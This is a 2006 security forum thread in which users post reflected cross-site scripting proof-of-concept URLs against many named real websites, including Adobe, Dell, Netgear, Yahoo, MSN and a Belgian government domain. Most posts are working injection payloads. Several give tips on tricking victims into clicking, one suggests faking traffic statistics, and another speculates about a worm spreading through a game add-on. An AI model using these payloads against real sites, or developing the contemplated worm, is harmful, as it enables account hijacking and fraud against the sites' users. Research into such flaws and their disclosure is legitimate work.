http://www.alexa.com/site/site_stats/signup?site_url=http%3A%2F%2Fasdf.com%2F%3F%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&range=3m&widget=g&submitted=true&mode=graph&amzn_id=
http://www.altavista.com/web/res_text?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

These have been out there for a while but are still unfixed.

Since not a lot of people read russian I thought I'd repost some of the stuff that securitylab.ru has been posting as well:

http://boards.live.com/themes/us/en/ccode.aspx?ForumId=0--></script><script>alert(String.fromCharCode(83,101,99,117,114,105,116,121,108,97,98,46,114,117))</script>
http://movies.msn.com/movies/genre.aspx?genre=Comedy&');alert('www.securitylab.ru
http://boards.live.com/Travelboards/board.aspx?BoardID=144&y000=%20--></script><script>alert(1)</script>
http://www.adobe.com/cfusion/search/index.cfm?loc=en_us&term=%3C/title%3E%3Cscript%3Ealert(1)%3C/script%3E

He's been finding a lot lately, but they've been closing down just as fast (a good thing).

- RSnake
Gotta love it. http://ha.ckers.org

One that would require some SEing, not only do they need to press the link, they need to press the continue button in the us users section. Still... could be used for something.

[[url=http://music.yahoo.com/ymu/country/?refurl=javascript:alert('xss');//&data=ymu&.src=]music.yahoo.com[/url]]

Edit:
Another one on the same site, just ask them to view this music video:

http://music.yahoo.com/relaunch/?vid=35111115&fp=1&app=video&skin=23&destURL=http://music.yahoo.com/promo-29644410-158-20060814'});alert('xss');//

The url didn't like being inside a [ url ] tag.

Edit:
https://www.screenselect.co.uk/visitor/sign_up_1.html?promotion_code=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E - MSN's dvd rental site.
http://www.screenselect.co.uk/visitor/browse.html?node_id=6539%22asd%3E%3Cscript%3Ealert('xss')%3C/script%3E

We could post XSS flaws on major sites all day long if we really wanted.

Edit:
http://www1.euro.dell.com/content/products/category.aspx/desktops?c=uk&cs=ukdhs1&l=en&s=qwerty');alert('xss');//
Then convince them to press the "Printable version" link at the bottom right. I guess this will work on any page that has the link on it.

http://www.netgear.com/Products/BridgesAccessPointsandExtenders.aspx?for=Business+qwe%22;alert('xss');// or http://www.netgear.com/Products/BridgesAccessPointsandExtenders.aspx?for=Business+qwe%22%0aalert('xss')//

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 5 time(s). Last edit at 08/22/2006 09:50AM by WhiteAcid.

Nice finds! Netgear should definitely know better. Eesh! Looks like the Yahoo ones are fixed (not really much of a surprise, they are pretty on top of this stuff), but the others remain intact.

2 xss on gov.be domain =) Cause I'm from Belgium : P

http://directory.gov.be/home/top/category_id/%22%3E%3Cimg%20src=qsd%20onerror=alert(2006)%3E

POST /home/search search_string=%22%3E%3Cscript%3Ealert%28%2FBlwood%2F%29%3C%2Fscript%3E&Submit2=Chercher+dans+directory

Well if you want to try to fool someone into thinking you get lots of traffic you can use the one on Alexa: http://www.alexa.com/site/site_stats/signup?site_url=http%3A%2F%2Fasdf.com%2F%3F%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&range=3m&widget=g&submitted=true&mode=graph&amzn_id=

- RSnake
Gotta love it. http://ha.ckers.org

Nice one =)
What a bout this one :
http://www.homme.lycos.fr/hotbabes/categorie/%22%3E%3Cbody%20onload=alert(%22Blwood%22)%3E

Very know in France ;) webmail, search...

Let's do a XSS challenge :P ?



Edited 3 time(s). Last edit at 08/26/2006 01:09PM by Girzi.

What kind of challenge? Or rather, is finding XSS really a challenge? :)

- RSnake
Gotta love it. http://ha.ckers.org

There's an interesting list of vulnerable sites: http://web3.m34s11.vlinux.de/xss_research.htm

Some of it appears to still work even though it was updated last month.

haha Nice list :) i was dead of laugh when I saw hackin9.org on the list !!

http://www.serverspy.net/site/stats/mods.html?g=0%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E
http://www.allakhazam.com/fsearch.html?subject=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&content=&poster=&date1_m=1&date1_d=1&date1_y=1999&date2_m=1&date2_d=1&date2_y=2007&cats=all&dosearch=1
Major gaming websites, one for FPS games one for MMO games. Search scripts fail to sanitize quotes.

MMORPGs are an interesting avenue for spreading massive XSS worms that I hadn't thought of. Are there any MMORPGs with browser based input? Seems like a bad idea, but I could totally see why they might build a web-browser interface into games.

- RSnake
Gotta love it. http://ha.ckers.org

A couple...

Results 1 - 10 of about 2,270,000 for "web based mmorpg".

-id

Yes, sir there are. I've thought a lot about it. In World of Warcraft, you're allowed to make custom UI mods. A lot of the game takes place in what they call "raid content" aka 40 man dungeons. 40 players going into a dungeon, basically. Well, damn near all of these guilds that run these dungeons require you to run a few mods that I've been interested in exploiting but I'm just a beginner. One that comes to mind is CT_Raid. It's a mod for tracking the life, mana, status effects, etc.. of all the raid members, it basically joins a chat channel and sends messages telling the rest of the channel how you're doing. I've modded mine to report version # 420.2600 and I've been very interested in the possibility of a CT_Raid worm.

If you're the raid leader or marked as an assistant, you can execute /rajoin (it's a CT_Raid command) and force everyone in the raid with CTRaid to join your CTRaid channel and sync with you. There's also a "battleground" called alterac valley that's 40 man where you get automatically put into a raid with the rest of the people on your team. I could see a worm propegating there through a vulnerability in the mod (so not owning everyone but 60-75% would be a pretty accurate number).

Like I said, I'm just a beginner but I would love for a "security expert" to take a look at the mod and either help me learn or just tell me what he thinks. They're all written in XML and LUA by the way, I realize that's very important, so there it is. But I've already seen a lot of threads on http://ui.worldofwar.net (A WoW UI development website) about executing third party programs from a UI mod but whether you're able to overflow a buffer or something, I do not know. I'm a lot more interested in SQL injection, XSS, remote file inclusion, web application security, etc.. at the moment but I wouldn't mind switching gears.

Speaking of WoW, here's another major "WoW database"
http://www.goblinworkshop.com/search2.html?s=%5C%22%3CSCRIPT%3Ealert%28%5C%22kefka%20was%20here%5C%22%29%3C%2FSCRIPT%3E%5C%22

http://www.go2.com/webbrowser/indexSearch.cfm?isSuggestion=1&tokenString=%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&go2search=Category&accountAction=createTemp&StreetAddress=&city=&State=&zipcode=&radius=10&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

http://comsearch.comcast.commerce.atomz.com/?q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&x=0&y=0
http://home.bellsouth.net/s/s.dll?spage=search%2Fresultshome1.htm&_pgoffset=0&startdate=01%2F01%2F2010&man=1&num=10&type=cat&SearchType=web&string=%22%3CSCRIPT%3Ealert%28%22kefka+was+here%22%29%3C%2FSCRIPT%3E%22&imageField.x=0&imageField.y=0&imageField=search



Edited 1 time(s). Last edit at 08/29/2006 07:41PM by kefka.

EVE-online is a game I tried out at the start of the year, didn't like it all that much. That's a MMORPG with an in built browser. It's there so you can read the developers blog, game news and here's the kicker, pressing the website link on a clan's profile opens the ingame browser to their site, which can be hosted anywhere.

I didn't try playing with that, and doing so now would require a new subscription which costs money, but it could be fun to do. Most likely their ingame browser simply doesn't support any JavaScript though, so it cannot possibly execute anything.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Hrmm... that would be odd if they didn't support JS (that would actually be surprising to me) as it's just easier to include the entire MSIE framework rather than crippled versions. But even still there are other things you can do without JavaScript, like CSRF. Really most of what the JavaScript port scanner is is a series of CSRF attacks strung together. It is possible that this could be used as a mechanism to modify firewall settings, for instance. I wonder how full featured the browsers in these things are.

There are also browsers embedded in chat clients now too... that feels ultra scary to me.

- RSnake
Gotta love it. http://ha.ckers.org

http://www.traveltree.co.uk/pages/affiliatefr.asp?URL=javascript:alert('XSS');

- RSnake
Gotta love it. http://ha.ckers.org

http://www.sparkfun.com/commerce/advanced_search_result.php?keywords=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&x=0&y=0

one of the best (read: cheapest) places for hardware components, if your a hardware hacker.. so please be gentle.

-maluc

http://www.uo.com/cgi-bin/search.pl?words='%3E%3Cscript%3Ealert(1337)%3C/script%3E%3Cb%20

it seems people still play ultima online..

-maluc

blogshares.com
rawstory.com
hawkee.com
seq.org
mindswap.org
free-php.org
shadows.com
php.com
actifpub.com
mojo.zug.com

hahah, I love the php.com one! Ouch!

- RSnake
Gotta love it. http://ha.ckers.org

id just pointed out to me that php.com is parents helping parents, not the programming language. Oops! Not quite as cool.

- RSnake
Gotta love it. http://ha.ckers.org

yes, a very interesting view of what kinds of things you're all into....

-id

Yeah... nothing too great there, on my little list. I found them a few days ago using Google when I was trying to find some Location:-based redirrect scripts for a project of mine.

http://www.marketwatch.com/tools/marketsummary/default.asp?siteid=mktw%22%0aalert(%22asd%22)//
http://www.marketwatch.com/tools/quotes/quotes.asp?symb=qwerty&vc=&siteid=mktw%22%0aalert(%22asd%22)//&dist=dropmenu
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.arto.com/brugere/login/default.asp?visopret=%26fc=0&destination=&returnUrl=&action=submit&brugernavn=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E&kodeord=&xss_note=Basic%20XSS%20in%20the%20username%20field (using POST - actually arto.com)

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

I will have to grab hhh.net/com/org and make a "hackers helping hackers" site

-id

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://userfriendly.org/cgi-bin/survey.cgi&personalemail=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E (userfriendly.org)
I originally contacted them on July 21st, no reply.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer